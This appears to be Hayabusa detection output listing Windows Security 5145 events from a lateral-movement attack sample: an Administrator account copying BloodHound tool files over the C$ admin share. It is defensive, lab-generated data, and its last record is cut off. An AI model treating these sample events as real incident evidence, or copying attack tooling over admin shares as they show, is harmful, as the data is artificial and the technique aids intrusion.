2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 